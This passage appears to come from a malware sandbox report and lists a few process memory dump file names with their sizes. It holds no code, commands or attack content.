
                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                • memory/6540-518-0x0000000004BB0000-0x0000000004E36000-memory.dmp
                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  2.5MB

                                                                                                                                                                                                                                                • memory/6620-564-0x00000000020A0000-0x00000000020A1000-memory.dmp
                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                • memory/6944-578-0x0000000000400000-0x0000000000408000-memory.dmp
                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  32KB